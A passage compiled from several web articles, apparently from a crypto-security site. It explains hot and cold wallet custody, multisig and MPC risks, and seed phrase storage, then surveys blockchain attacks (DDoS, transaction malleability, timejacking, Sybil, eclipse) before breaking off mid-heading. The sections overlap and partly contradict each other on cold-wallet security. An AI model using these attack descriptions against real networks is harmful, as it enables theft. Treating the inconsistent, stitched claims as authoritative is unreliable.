with large amounts of Bitcoin and other crypto-assets. For example, a cryptocurrency exchange or crypto fund custodian would typically offer instant withdrawals and might be responsible for hundreds of thousands of Bitcoins and other crypto assets. To minimize the ability that hackers could steal the entire reserve in a security breach, the financial services operator would follow a standard protocol, by keeping the majority of the reserve in cold storage, while holding a smaller percentage of the assets available for day to day trade activity. Essentially they would not store the majority of digital assets’ private keys on their server or any other connected computer. The only amount kept on the server is the minimum required to cover anticipated customer withdrawals. Methods used to secure private keys for digital assets: Data encryption that protects wallets with a strong password Backups for digital wallets in case of computer crashes or fraud Cold wallets are not truly secure as, at some point, they need to send funds and by doing so they rely on bi-directional communication and are connected to the internet. This is when they can be compromised and be infected with malicious data and extremely vulnerable to attacks. Therefore all cold wallets become hot wallets dispelling the theory of total security for institutional custodians. Hot wallets today have an important role as they are capable of providing easy access to funds and processing automatic transactions, however private keys of the hot wallets are stored in a method that requires that they are always connected to the internet. There are different type’s of hot wallets that take a different approach on how to store private keys. In mathematical perspective, some duplicate private keys between different participants and other divide a private key between the participant. In other words, hot wallets today tackle the security risk by distributing private keys. The Hot wallets participants maintain control of their private keys, so the cryptocurrency assets in the hot wallet remain under the holder’s control. However, the assets remain vulnerable to hacking, as a malicious person or group which gains access to your computer or smartphone would theoretically also be able to drain your wallet via getting access to the private key. Hot wallet’s primary advantage is that it can be used for automatic and fast access transactions. Individuals looking to actually make purchases with their cryptocurrency assets might choose to use a hot wallet, for instance, as the holdings in that wallet can be transferable across the internet and in general, the number of crypto assets is at a high enough value, therefore it is not worth the time and money that hackers would invest to steal. On the other hand, hot wallets are definitely vulnerable to security breaches as they have ongoing access to the internet. Different types of hot wallets all store the private keys on internet connected applications: Basic Hot wallet – Direct connection of the private key on the Internet Multisig Native Wallet – duplicates private keys – you only need to compromise two participants in order to gain access Multiparty computation (MPC) – Distributes private key between 2-5 participants If we look at the Multisig method even with 2-3 people or entities having to confirm a particular transaction, hacker groups will spend millions on institutional targets and they only require attack vectors for 2 out of 3 in order to compromise the security. Hacker groups are willing to do this as they stand to gain hundreds of millions in stolen crypto assets. Even the MPC methodology is vulnerable to a variety of attack vectors. With the MPC approach, multiple non-trusting computers can each conduct computation on their own unique fragments of a larger data set to collectively produce a desired common outcome without any one node knowing the details of the others’ fragments. The private key that executes the transaction is then, a collectively generated value; the proponents of MPC maintain that at no point is a single computer responsible for an actual key. MPC based wallets are said to be a better solution to any hardware or multisig wallets in the market. They are mathematically proven to be safer, completely off-chain, providing higher flexibility and are generally ledger agnostic. Unfortunately, even with the fragments on multiple devices, it is still not an entirely safe solution because sophisticated hackers might be able to linger within a cluster of machines long enough to trace and reconstruct a key. If they manage to compromise one single employee machine or server they will be able to move laterally in the network and compromise other devices which are a part of the signature method. So this can also be proved false as hacker groups are sophisticated enough to find the vulnerabilities in this method and are willing to spend millions to steal billions. Using the above solutions could essentially prevent a rogue employee from stealing keys on-site, or from a cold-storage facility, or from any hardware device managed entirely by the company. There are mpc wallet providers that try to limit an attacker or a rogue employee from entering a single network and collecting all of the cryptographic information they would need to authorize and sign an illegal transaction, however, this solution is also not 100% secure and merely mitigating attack vectors is just not an option when billions are at stake. Why should the industry care? As of writing this article the total market cap for cryptocurrencies has exceeded $218 billion and is now in the 10th year of existence. In this past 10 years there have been many notable hacks. All institutions with custody of large amounts of crypto assets have a responsibility to their investors to ensure the most robust security options are deployed throughout their enterprise. Furthermore, the hacks also lead to various other cyber damage Theft of assets – irreversible Reputation damage Theft of private customer data Loss of jobs Closing down the business But that’s a different article… Although there is a lot of volatility in the market which in part is driven by FOMO and media hype, it is critical to acknowledge that a major factor is the security of digital assets and this can affect the value of a cryptocurrency or an exchange asset valuation fundamentally altering the entire ecosystem. Key Takeaways: A hot wallet is always connected to the internet; hence it’s prone to online attacks – but it’s more convenient for daily use. A cold wallet is mostly not connected to the internet; hence, it’s less prone to online attacks – but it’s less convenient for regular use. When choosing a wallet, you should consider the security, convenience, fees, supported coins, and insurance factors. If you are planning to buy digital assets, deciding how and where to store them is not an option, it’s a necessity. Unlike fiat currencies, cryptocurrencies live on the blockchain and require a proper storage platform known as a wallet. These wallets give you access to your crypto holdings through public and private keys. You use a public key to send and receive cryptocurrencies and a private key to confirm transactions and prove ownership of a crypto wallet. You can think of your public key as your bank account number and your private key as your pin. The main difference between hot vs. cold wallets is that the former stores private keys online while the latter stores them offline. This article takes a deep dive into the hot and cold wallet debate, considerations when choosing a wallet, and using both hot and cold wallets to manage your crypto portfolio. What is a Hot Wallet? A hot wallet is a software wallet that stores public and private keys online. You can access it through your computer or smartphone when connected to the internet. Hot wallets are more convenient for daily use as you don’t have to plug them in and out to use them – you just need an internet connection. They are also typically free to download and use, complete with a user-friendly interface that makes it easy for anyone to get started. Hot wallets are vulnerable to attacks because they store public and private keys online, which exposes you to risks like phishing and other scams. Types of Hot Wallets There are two types of hot wallets – exchange-based, where a user opens an account with a centralized exchange that acts as the custodian of the users’ funds in their care, and non-custodial software hot wallets. Exchange-Based Wallets Exchange-based wallets are part of a centralized exchange. Centralized exchanges are custodial institutions that hold the private keys to their users’ addresses. This means that customers of such custodial financial platforms are not in total custody of their assets, as these are deposited into hot and cold wallets held by the institution. Unfortunately, this exposes users to the risk of the exchange engaging in certain activities that result in the loss of customers’ funds, as seen in the case of FTX in November 2022. Moving forward, there is an industry wide push for more transparency and to hold custodial institutions accountable for their customers’ tokens with the introduction of Proof of Reserves. While there is an overall drop in centralized exchange activity, exchange-based wallets are still popular, especially with retail investors, as they make it easy for users to buy and sell cryptocurrency with fiat money. Also, in the event you lose your log-in details, access to your wallet can be restored by contacting the exchange’s customer service. Non-Custodial Software Hot Wallets Non-custodial software hot wallets can be accessed through mobile, browser or desktop applications.. Most of the time, they’re available across all three. In the case of these hot wallets, users are responsible for their own private keys and have full control over their funds. While this means your funds are safe in the event of a bank run, as they’re not stored in a custodial institution, if you lose your seed phrase, you will no longer be able to access your wallet and the crypto stored within. What is a Seed Phrase? A seed phrase is also known as a recovery phrase. This is a random list of 12, 18, or 24 words that can be used as a master key to recover crypto assets on-chain. Seed phrases generate the private key, which in turn are used to generate the public key. Wallet software typically generates a seed phrase, instructing the user to write it down before storing it safely. The seed phrase acts as a master key to unlock the user’s access to their wallet, so it must be stored safely and never online. When it comes to storing your seed phrase, don’t just write it on a piece of paper, which will fade over time or possibly be destroyed by water and fire. Instead, use crypto steel to record your seed phrase, and make multiple copies as backup. Never store your seed phrase on a password manager or anywhere online or on your devices. That includes not taking a photo of it, or putting it in a google doc or note. Examples of Hot Wallets MetaMask – Best for Exploring the Ethereum Ecosystem MetaMask is one of the most popular hot wallets in the crypto space and supports all EVM-compatible tokens. It’s easy to use and is available on desktop and mobile devices. Besides, it has extra in-built features for swapping, sending, and receiving crypto and collecting non-fungible tokens (NFTs) across networks. Exchange-Based Wallets – Easy Fiat On-Ramp Exchange-based hot wallets are similar to MetaMask, mostly supporting desktop and mobile devices. Exchange-based wallets connect to most banks to ensure easy onboarding, allowing new crypto users to directly buy crypto using their bank accounts instead of brokers. You may (or may not) have to open an account with the exchange to use their wallet services. However, as mentioned above, these exchange-based wallets are custodial, which means the exchange essentially holds your private key and your coins, promising you that you’ll be able to withdraw your coins when you want to. Exodus – Best for Desktop Exodus is the best hot wallet for desktops due to its high transaction speed, ease of use, and diverse client functionalities it provides. It’s one of the most visually appealing and intuitive wallets in the crypto space. It started as a desktop-only wallet but has expanded to support mobile devices. However, the Exodus desktop app for Windows, Linux, and Mac operating systems, is still the wallet’s primary offering. What is a Cold Wallet? A cold or hardware wallet is a physical device that stores your private keys offline, costing anywhere between $50 and $250. Cold wallets are the most secure type of crypto wallet, as they are not connected to the internet and are therefore unlikely to be compromised by hackers (unless they have access to your private keys AND the hardware wallet). Hardware wallets are physical devices that may resemble a USB stick or hard drives, which work by storing your pass codes, PINs and private keys on the device itself. In fact, even if the computer is infected with malware, the cold wallet remains safe as its private keys are held in a chip that never connects to the internet. So even if your computer is hacked or your online wallet is compromised, your coins will still be safe… unless your passcode and device are stolen. However, as cold wallets are physical objects, that also opens them up to the risk of loss through careless handling. In the unfortunate event that your crypto hardware wallet is lost or stolen, you can use your seed phrase to regenerate your private keys. So remember to keep your seed phrases safe, offline, and on hard copy. As cold wallets are ideal for long-term crypto storage, they’re better suited for hodling crypto than trading funds. Ledger Source: Ledger Nano X Ledger is one of the most popular crypto hardware wallet providers, offering the Ledger Nano X, Ledger Nano S and the Ledger Nano S plus wallets. These devices are about the size of a thumb drive, running on the Ledger operating system called the Blockchain Open Ledger Operating System. It also has an in-built clear OLED display screen interface, and two navigation buttons for confirming transactions. Ledger comes complete with a Ledger Live mobile app and a high level of security with its secure element chip used to store cryptographic data. Their flagship model, the Ledger Nano X, offers cryptocurrency compatibility of more than 5,500 tokens. Trezor Trezor is another well-known hardware wallet that offers the Trezor One and Trezor Model T. The Trezor Model T offers compatibility with 1,456 coins and tokens, and comes with the desktop, browser and Android Trezor Suite. Trezor Suite is a user interface which lets you search and buy cryptocurrencies, manage your holdings, and send crypto securely. While this improves the user experience, there is the potential to introduce security vulnerabilities as you are using internet-enabled devices. Considerations When Choosing a Wallet Depending on your needs, you may opt for a hot wallet, a cold wallet, or both. We’ve summed up how the three types of wallets covered above compare against each other in this table: Security Security is a core feature when choosing a crypto wallet. Blockchain technology is known for its secure and immutable nature; ensuring your wallet has the best security features is necessary. Cold wallets are more secure than hot wallets since they are not always connected to the internet with exposure to potential cybersecurity risks like phishing or other hacks and scams. Besides, ensure your wallet has two-factor authentication (2FA) functionality to prevent unauthorized access to your assets. Convenience Since cold wallets store private keys offline, they involve plugging in physical devices and linking to web-based accounts to transfer funds. On the other hand, hot wallets live online; hence they are much easier to use for everyday transactions, like day trading. Additional Transaction Fees You’ll be still subjected to gas fees, regardless of whichever wallet you’re using. However, exchange-based wallets may include an additional charge that is derived from gas prices, although this fee may be waived if you are holding or staking the exchange’s native token. Before downloading or purchasing any wallet, check their service charges first. Supported Coins The wallet you plan to use may not support the coin you want to invest in. Some wallets support only one coin! Consider Mycelium, for instance. Despite having exceptional functionalities, it only supports Bitcoin. Therefore, be sure to check the wallet’s list of supported coins and tokensbefore using it to avoid disappointments. Insurance Some custodians provide asset insurance for users who incur losses through a technical problem or theft. Custodians differ in insurance policies, but selecting one that insures your assets in collaboration with a financial institution is advisable. For example, Binance provides insurance for USD deposits of up to $250,000 for U.S. customers. It has partnered with the Federal Deposit Insurance Corporation (FDIC) to implement this policy. Using Hot and Cold Wallets to Manage Your Crypto Portfolio Hot wallets are more convenient for daily use than cold wallets. On the other hand, cold wallets guarantee maximum security than hot wallets. Both wallets support a broad range of cryptocurrencies. Therefore, the ideal wallet for you relies on whether you prioritize the safety of your funds over the convenience of using a wallet regularly. You can enjoy both benefits by combining both methods. For instance, you can hold a small percentage of funds in a hot wallet for trading purposes and keep the rest of your funds in a cold wallet as a long-term investment. As a blockchain network participant, o party can rely on so-called “wallets” to manage its accounts and interaction with the blockchain. A party has multiple keys. Problem A party’s wallet is vulnerable to malicious attacks leading to key theft. If compromised, an attacker can use the key to issue transactions in that party’s identity. How to prevent the compromisation of keys? Forces: Security – A key may be hacked when being stored in a device, especially when connected to the Internet. Usability – Some keys may be frequently used by blockchain participants while other keys may be used infrequently or might act as backup. Solution Users can choose to store keys in 2 types of wallets, namely hot wallet and cold wallet. Hot wallet typically refers to the blockchain gateways that are connected to the Internet. Hot and Cold Wallet Storage Pattern Through a hot wallet, a user is able to directly issue transactions to the blockchain. Hence, a hot wallet typically holds frequently used keys. Cold wallet refers to key storage that is kept off-line to minimise potential attacks. Thus, a clod wallet typically contains rarely used keys. A cold wallet can be any device disconnected from the Internet or even a paper recording an entity’s keys. When a key stored in the cold wallet is required to sign a transaction, the user needs to connect the cold wallet device to a computer and copy-paste the key in the relevant field. It is also possible to automate the migration of keys between the 2 wallets based on their frequency of use, e.g., least recently used and most frequently used. Also, a certain key can be marked as critical such that it primarily stays in the cold wallet. When it is required to sign a transaction it can be copied to the hot wallet. However, as soon as the transaction is signed it should be deleted from the hot wallet. In certain application settings, blockchain platforms, and wallet implementations, it is also possible to sign transactions entirely on the cold wallet and use the hot wallet to issue/relay the signed transactions to the blockchain. Benefits Secure storage – Cold wallets are isolated from the Internet; hence, provide secure storage for keys. Usability – Such a secure storage also preserves the usability of keys, as once a cold wallet is connected to the Internet (either directly or via a middleware), a party can utilise those keys. Drawbacks Security – Hot wallets store one’s secret keys online hence are more vulnerable to theft. A cold wallet becomes more vulnerable as soon as it is connected to the hot wallet to copy/migrate a key. Usability – Cold wallets are more secure than hot wallets but less convenient to use, as the user has to connect to the cold wallet. Related patterns In master and sub key generation pattern master key can be kept in the cold wallet while sub-keys can be stored in hot wallet. Key sharding pattern could be used in a wallet application to split and merge a key to minimise its compromise. When being integrated into wallet applications, predefined delegates in delegate list pattern can replace key ownership of a compromised key. Known uses MyEtherWallet is a hot wallet with a graphical interface for instant payment and withdrawal in Ethereum. Trezor is a cryptocurrency hardware wallet, designed to store and encrypt users’ coins, passwords, and other digital keys. It is a single-purpose computer with independent memory to save all private data. Ledger provides hardware wallet products to stores users’ private keys in a secure hardware device, protecting the cryptocurrencies. Explore the different crypto storage options What are the pros and cons of each wallet? A hot wallet refers to any cryptocurrency wallet connected to the internet. Generally, hot wallets are easier to set up, access, and accept more tokens. But they are also more vulnerable to hacker attacks, possible regulations, and other technical vulnerabilities. Cold Storage refers to any cryptocurrency wallet that is not connected to the internet. Overall, a cold wallet is more secure, but it doesn’t accept as many cryptocurrencies as hot wallets. Should I Get a Cold Wallet? If you are going to own Bitcoin, Ethereum, or other cryptocurrencies worth more than $100, you could buy a cold wallet right now — this is how much it costs. Maybe you’ve heard people say, “Bitcoin gives you this opportunity of being your own bank”? There are advantages and disadvantages to this responsibility. Generally, cryptocurrencies have fewer middleman fees, less messy banking regulations, etc. Still, it is your responsibility to ensure the safety of your assets. Overall, as a rule, you should leave as much money in your hot wallet as you would with a traditional leather wallet that you keep in your pocket. Think of it this way, if a thief was about to steal your regular wallet, you would only lose the money you have in your pocket, not the money in your bank account. In short, here’s an analogy that can help you: a hot wallet can be thought of as a pocket wallet that you walk around town with; a cold wallet is a bank deposit. Pros & Cons of Hot Wallets Using a hot wallet will give you the following benefits: By entering your pin and access number into the wallet, you quickly access your coins. The investment cost is lower. It has an extensive portfolio of applications or software that function as a hot wallet. You need to set a PIN code or a security code to use it. They allow you to connect to any platform so you can operate and trade. Using one of these wallets may have the following disadvantages: Higher risk of theft as money is stored in the cloud and is more vulnerable to cyber crooks. It needs to be connected to the internet all the time. Otherwise, it can’t be supported, so it could be a big problem if the internet connection fails. Pros & Cons of Cold Wallets Using this wallet will give you the following benefits: This type of wallet works without the internet, giving you a high level of security since many thefts take place on the internet. A cold wallet supports ERC20 or other tokens standards, which can support an unlimited number of tokens.. You need to set a PIN code or a security code to use it. You can take your device anywhere. Using one of these wallets may generate the following disadvantages: There is a risk of losing your device. You cannot trade with these types of devices. You need to invest around $100 to get it. Like any physical device, it is prone to failure, corruption, or reading problems. Remember that if you want to trade, a hot wallet is the better option. Still, we recommend encrypting it as best you can and choosing the best software for the most significant security. On the other hand, if you are a non-trading investor and want the highest level of protection, a cold wallet will be a better choice. Hot and cold wallets are both necessities for safely storing your crypto assets. When the former is used to send and receive crypto tokens, the latter securely holds your accumulating cryptocurrencies without vulnerabilities. As hot wallets require an internet connection to send and receive tokens, they are largely at risk of crypto attacks that prove to be hugely expensive. So, it cannot hold a large sum of tokens. Here is where the usage of cold wallets comes into play. Utilizing both hot and cold wallets is a safe practice in crypto vulnerability management, leaving no loopholes for attackers. Let us understand the hot and cold wallet architecture and how it should be set up to mitigate the risk of vulnerabilities. What are hot wallets? What are cold wallets? Hot wallet vs Cold Wallet: Differences Hot and cold wallet setup How does hot and cold wallet interact? How do hot and cold wallet setups in big systems work? What are hot wallets? Hot wallets are crypto wallets that are always connected to the internet and are more easily accessible for users than cold wallets. They can be mobile, desktop or web-based wallets, and are user-friendly and facilitate easy transfer of currencies between crypto users. Private keys are kept and encrypted on the app itself in hot wallets and stored online. It has hidden vulnerabilities, and hackers can target it to break into the system. Due to its ease of use, it is the most preferred wallet for buying and trading cryptocurrencies or cashing out assets after a while. How does a hot wallet storage work? When you install a hot wallet storage into your computer or device, it allows you to buy, send and receive crypto assets without really holding any crypto. Rather it holds the private keys using which a user can initiate transactions. This is possible, as it interacts with the blockchain storing your assets. Metamask is one of the most popular hot wallets available today. So, we will explain how a hot wallet works using Metamask. Metamask is available as a web browser extension that acts as a bridge between the blockchain, especially Ethereum, and your browser. When you download and install Metamask and add it as your browser extension, you will be asked to either ‘import wallet’ or ‘create a wallet.’ Import wallet allows you to add an existing wallet by typing a secret recovery phrase, while the latter enables creating a new crypto wallet. If you create a new wallet, you need to set a new Metamask password to secure the app or platform on your device. This password can be a string of characters, face recognition, or even a fingerprint that you can regularly use to access the app, instead of a secret recovery phrase. Once you create a password, you must copy the secret backup phrase and paste it or write it down in a safe place. For each account you have in your Metamask wallet, you will be provided with a private key. You can unlock your cryptocurrencies using this private key. What are cold wallets? Cold wallets are hardware-based and exist offline. Although a cold wallet is not as convenient to use as a hot wallet, it is far more secure. Using this offline wallet keeps your keys entirely protected from online hackers. Cold wallets can be paper wallets or hardware devices. A paper wallet is a traditional way of keeping private and public keys written down or printed on paper. It is a safe way to store keys as it is not prone to phishing attacks. Hardware wallets are external devices in the form of a USB or Bluetooth device that stores your keys. As they offer less liquidity, cold wallets are best for people planning to buy and hold their crypto assets for a long period. To do transactions between an offline cold wallet and an online hot wallet, you need to connect the hardware device to another device with internet accessibility, mostly a computer, using a plug, then transfer the required amount from the cold wallet to the hot wallet. How does a cold wallet storage work? A cold wallet, on its own, cannot connect to a blockchain and complete a transaction. When a user wants to use a cold wallet for transactions, it needs to be connected to a device with an internet connection. However, this does not put your private key under security threat. Let us see how it works. A cold wallet storage can be roughly divided into two components, a cold wallet core and a cold gateway. While a cold wallet core has no internet access and is completely air-gapped, a cold gateway is connected to the internet. A transaction is created in the cold gateway in a cold wallet, which is then signed in the offline cold wallet core. So, if a user wants to send x number of tokens to another wallet, the transaction will be created in the cold gateway with an internet connection, but the transaction signing will be done offline. After the transaction is signed, it is disclosed or broadcast online in the cold wallet core. Let us take the example of the cold wallet ELLIPAL to understand this better. ELLIPAL is an air-gapped hardware wallet that is essentially a secure cold wallet. It is entirely isolated from the internet and is designed to prevent unauthorized access, hacks, malware and other online attacks. So, to initiate transactions, the users need to install the ELLIPAL mobile app, acting as a proxy for it to connect to the blockchain. The whole process of transactions via an ELLIPAL wallet can be summarized into the following steps: The user initiates a transaction on the app. The app asks for confirmation from the cold wallet. The hardware wallet signs the transaction via a private key. After approval, the app completes the transaction Hot wallet vs Cold Wallet: Differences Hot Wallet Cold Wallet Internet Connectivity Online Offline Accessibility Easily accessible Low accessibility Tangibility Software-based wallets; so, intangible Physical wallets; so, tangible Types Mobile, web or desktop wallets Paper or hardware wallets Safety Prone to hacking and attacks. So, less secure. Less threat from hacking and attacks. So, more secure Convenience Easy and convenient Less convenient Cost Less expensive More expensive Usability Best to store a small amount of crypto Best to store large amounts of cryptocurrency Hot and cold wallet setup Although using a hot wallet for transactions is easy and convenient, it cannot be used to keep a large number of cryptocurrencies due to security threats. It is advisable to store your large amount of cryptocurrencies in cold wallets as they are the least vulnerable to security threats, such as malware attacks and phishing. One important way of setting up wallets to avoid risks is to combine both hot and cold wallets, which reduces your funds’ online exposure. In this, each wallet is set up for different purposes. The hot wallets serve as the receiving wallet and sending wallet. The receiving wallet will manage the funds coming to the exchange, while the sending wallet will be used to send cryptos for transactions and trade. As both the sending and receiving wallets will be hosted on online servers, the number of funds kept in both wallets should be minimized to reduce the risks of crypto vulnerability. The rest of the cryptos should be stored in your cold wallet. Doing this can ensure that most of your asset is safe in case of any security compromises. How does hot and cold wallet interact? As all of the funds that are transferred to you come to your receiving wallet, there are chances of crypto accumulation in your receiving wallet, resulting in crypto vulnerabilities. So, you need to send most of it to the cold wallet and some to the sending wallet. You need to have a minimum amount in your receiving wallet to transfer to the sending wallet once it falls short of cryptos, and this ensures that the sending wallet has enough cryptos whenever needed. However, suppose funds are not reliably coming to the receiving wallet, and the sending wallet urgently needs currencies. In that case, you can transfer the required amount from the cold wallet to the sending wallet. How to mitigate crypto vulnerability? Assume that you have a total of 200 ETH in your possession, and at any time, you want to avoid risking more than 30% of your funds. Based on this calculation, you need to set maximum and minimum thresholds per wallet to reduce the severity of any malware attack. So, the receiving wallet should have a minimum of 10 ETH and a maximum of 20 ETH. Similarly, the sending wallet should possess at least 20 ETH and up to 40 ETH. The rest of your assets should be kept in the cold wallet. If you set a threshold for your sending and receiving wallets, adhere to it and ensure that the set amount does not exceed or drop down the limit. Excess funds are prone to vulnerabilities, and you cannot produce the required amount when needed if it is below the limit. So, always maintain an adequate amount of funds How do hot and cold wallet setups in big systems work? Hot and cold wallet setups vary, and each setup is designed based on the developer’s requirements and thought process. Through the following infographics, let us understand how hot and cold wallet setups are designed in big systems. In the above-given infographic, if a person wants to send x number of tokens to another user, they input a request in the front end of the application, which is fetched in the API layer or the backend of the app. The backend transfers the input request to the wallet server. In a typical wallet architecture, a wallet server handles multiple microservices like managing nodes, databases, APIs or transaction services. As the user input, in this case, is related to the transaction service, the request is sent to this microservice. The transaction service then sends the request to the wallet microservices, which handle all services related to the wallet. The wallet microservices can vary from platform to platform. In the above infographic, the wallet microservices include the following: Fund management for the hot wallet – It ensures that it always sticks to its threshold without crypto overflow or deficit to prevent risk exposure. Whitelisted IPs – It limits the number of people who can access your domain or server to a few trusted IP addresses permitted by you. Token – It manages and keeps track of your tokens, like x number of ETH or x number of SOL. Service monitoring – This microservice checks whether all services are working without glitches. Thresholds – These ensure that you have the required amount in your wallet or not to send it to others. 2-step authentication – It is a security process where you have to verify your identity twice before accessing the wallet ecosystem. Notifications – It alerts users on important matters like successful transaction completion notifications. KMS – Key management system or KMS helps create, store, and manage it safely. Rotate hot wallet When the transaction input is transferred from the transaction service to the wallet microservices, all of the above microservices are carried out. Once all the services are done, and it is ascertained that your hot wallet has enough number of tokens, the x number of tokens is sent to the receiver. The transaction is, then, said to be successfully completed. Conclusion Merging both hot and cold wallets can help mitigate the risk of crypto attacks for both the users and the service providers. It acts as a comfortable middle ground by offering the benefits of both wallets, where one is used for crypto trading, and the other is used to hold the cryptos safely. Even though only hot wallets were popular during the initial days of crypto emergence, usage of cold wallets is getting more popular these days. Moreover, blending hot and cold wallets is gradually gaining prominence among crypto experts and service providers, owing to its huge benefits. Using just one wallet is, thus, outdated, and people gradually realize the advantages of combining both hot and cold wallets as an additional security measure. GitHub Telegram: https://t.me/cryptodeeptech Video: https://youtu.be/NrQ3oNxlrlU Source: https://cryptodeep.ru/cold-and-hot-wallets Криптоанализ
  19. CRYPTO DEEP TECH In this article, we will talk about all known attacks on the blockchain, as well as smart contract vulnerabilities. Blockchain isn’t really as secure as we tend to think. Though security is integrated throughout all blockchain technology, even the strongest blockchains come under attack by modern cybercriminals. Blockchains can resist traditional cyber attacks quite well, but cybercriminals are coming up with new approaches specifically for hacking blockchain technology. In this article, we describe the main attack vectors against blockchain technology and take a look at the most significant blockchain attacks to date. Cybercriminals have already managed to misuse blockchains to perform malicious actions. Ransomware attacks like WannaCry and Petya wouldn’t have been so massive if attackers hadn’t received their rewards in cryptocurrencies. Now, it looks like hackers consider exploiting blockchain security vulnerabilities as their main source of revenue. In March 2019, white hat hackers found 43 bugs in various blockchain and cryptocurrency platforms in just 30 days. They even found vulnerabilities in such famous platforms as Coinbase, EOS, and Tezos. However, weak spots are often challenging to detect, since they can be hidden in unobvious places. For instance, the Parity multisig wallet was hacked by breaking a library that had a withdraw function in it. The attacker managed to initialize the library itself as a wallet and claim owner rights to it. As a result, 573 wallets were affected, $30 million worth of crypto was stolen, and another $180 million rescued by a white hat hacker group was later returned to the rightful owners. By attacking such huge networks as Bitcoin and Ethereum, cybercriminals show that they’re clever enough to disprove the myth of blockchain security. Let’s consider the five most common blockchain attack vectors: Blockchain Network Attacks A blockchain network includes nodes that create and run transactions and provide other services. For instance, the Bitcoin network is formed by nodes that send and receive transactions and miners that add approved transactions to blocks. Cybercriminals look for network vulnerabilities and exploit them with the following types of attacks. Distributed Denial of Service Distributed denial of service (DDoS) attacks are hard to execute on a blockchain network, but they’re possible. When attacking a blockchain network using DDoS, hackers intend to bring down a server by consuming all its processing resources with numerous requests. DDoS attackers aim to disconnect a network’s mining pools, e-wallets, crypto exchanges, and other financial services. A blockchain can also be hacked with DDoS at its application layer using DDoS botnets. In 2017, Bitfinex suffered from a massive DDoS attack. It was especially inconvenient for the IOTA Foundation, which had launched their IOTA token on the platform the day before Bitfinex informed users about the attack. Three years later, in February 2020, Bitfinex experienced another DDoS attack just a day after the OKEx cryptocurrency exchange noticed a similar attack. Transaction Malleability Attacks A transaction malleability attack is intended to trick the victim into paying twice. In the Bitcoin network, every transaction has a hash that’s a transaction ID. If attackers manage to alter a transaction’s ID, they can try to broadcast the transaction with a changed hash to the network and have it confirmed before the original transaction. If this succeeds, the sender will believe the initial transaction has failed, while the funds will still be withdrawn from the sender’s account. And if the sender repeats the transaction, the same amount will be debited twice. This hack is successful once the two transactions are confirmed by miners. Mt. Gox, a Bitcoin exchange, went bankrupt as the result of a malleability attack in 2014. However, Bitcoin seems to have solved this issue by introducing the Segregated Witness (SegWit) process, which separates signature data from Bitcoin transactions and replaces it with a non-malleable hash commitment to each signature. Timejacking Attack Timejacking exploits a theoretical vulnerability in Bitcoin timestamp handling. During a timejacking attack, a hacker alters the network time counter of the node and forces the node to accept an alternative blockchain. This can be achieved when a malicious user adds multiple fake peers to the network with inaccurate timestamps. However, a timejacking attack can be prevented by restricting acceptance time ranges or using the node’s system time. The timejacking attack is also an extension of the Sybil attack. Each node maintains a time counter which is based on the median time of its peers, and if the median time differs from the system time by a certain value, then the node reverts to the system time. An attacker can flood the network with nodes reporting inaccurate timestamps, which can cause the network to slow down or speed up, leading to a desynchronization. Routing Attacks on Cryptocurrencies A routing attack can impact both individual nodes and the whole network. The idea of this hack is to tamper with transactions before pushing them to peers. It’s nearly impossible for other nodes to detect this tampering, as the hacker divides the network into partitions that are unable to communicate with each other. Routing attacks actually consist of two separate attacks: A partition attack, which divides the network nodes into separate groups A delay attack, which tampers with propagating messages and sends them to the network Sybil Attacks in Cryptocurrency Mixers A Sybil attack is arranged by assigning several identifiers to the same node. Blockchain networks have no trusted nodes, and every request is sent to a number of nodes. Figure 1. Sybil attack During a Sybil attack, a hacker takes control of multiple nodes in the network. Then the victim is surrounded by fake nodes that close up all their transactions. Finally, the victim becomes open to double-spending attacks. A Sybil attack is quite difficult to detect and prevent, but the following measures can be effective: increasing the cost of creating a new identity, requiring some type of trust for joining the network, or determining user power based on reputation. A sybil attack is defined by Wikipedia as “a type of attack on a computer network service in which an attacker subverts the service’s reputation system by creating a large number of pseudonymous identities and uses them to gain a disproportionately large influence.” If the network does not keep the count of the nodes, then the attacker can completely isolate the victim node from the network. The sybil attack on blockchain also works similarly, where an attacker tries to flood the network with their controlled nodes so that the victim only connects to the attacker controlled nodes. This can lead to a wide variety of damages where the attacker can prevent genuine blocks from being added to the chain, the attacker can add their own blocks to the chain, or they can cause confusion among the nodes, hampering the general functioning of the blockchain network. In the above visual representation, the red nodes are controlled by the attacker, and they flood the network, making the victim connect only to a malicious node. Sybil Attacks on Identity-Augmented Proof-of-Stake IdAPoS is an identity-based consensus protocol for decentralised Blockchain networks that implements a trustless reputation system by extending Proof-of-Stake to facilitate leader selection in non-economic contexts. Like any protocol operating in a public/permissionless setting, it is vulnerable to Sybil attacks in which byzantine actors interfere with peer sampling by presenting artificially large numbers of identities. This paper demonstrates what influence these attacks have on the stability of member selection of a Blockchain system using the IdAPoS protocol and investigates how attacks can be mitigated. As a novel protocol, its vulnerability to this type of attack has not previously been researched. The research question is approached via an agent-based model of an IdAPoS system in which both honest and malicious actors are represented as agents. Simulations are run on some reasonable configurations of an IdAPoS system that employ different attack mitigation strategies. The results show that a super strategy that combines multiple individual mitigation strategies is more effective for containing Sybil attacks than the unmitigated protocol and any other individual strategies proposed. In the simulation this strategy extended the time until a system was taken over by a malicious entity approximately by a factor of 5. These positive initial results indicate that further research into the practical viability of the protocol is warranted Eclipse Attacks on Bitcoin An eclipse attack requires a hacker to control a large number of IP addresses or to have a distributed botnet. Then the attacker overwrites the addresses in the “tried” table of the victim node and waits until the victim node is restarted. After restarting, all outgoing connections of the victim node will be redirected to the IP addresses controlled by the attacker. This makes the victim unable to obtain transactions they’re interested in. Researchers from Boston University initiated an eclipse attack on the Ethereum network and managed to do it using just one or two machines. Eclipse attack arises in the blockchains, where the architecture partitions workloads and assigns tasks among the peers. As an example, if a chain has a node that has only eight outgoing connections and can support at most 128 threads at any given moment, each node has view access to only the nodes that are connected to it. The view of the chain for the victim node can be changed if an attacker attacks a specific node and gains control of the eight nodes connected to it. This can lead to a wide variety of damages that include double spending of the coins by tricking a victim that a particular transaction has not occurred, and also the attacks against the second layer protocols. The attacker can make the victim believe that a payment channel is open when it is closed, tricking the victim to initiate a transaction. The following diagram demonstrates a node under Eclipse attack. Figure : Eclipse Attack In the above visual representation, the red nodes are controlled by the attacker, and they can change the copy of the chain of the victim node by making it connect to attacker controlled nodes. Eclipse Attacks on Ethereum In this technical report, we present three vulnerabilities affecting the Ethereum blockchain network and client. First, we outline an eclipse attack that allows an adversary to partition the peer-to-peer network without monopolizing the connections of the victim. This is attack is possible by exploiting the block propagation design of Ethereum. Second, we present an exploit to force a node to accept a longer chain with lower total difficulty than the main chain. Finally, we outline a bug in Ethereum’s difficulty calculation. We provide countermeasure proposals for each reported vulnerability. Long-Range Attacks in 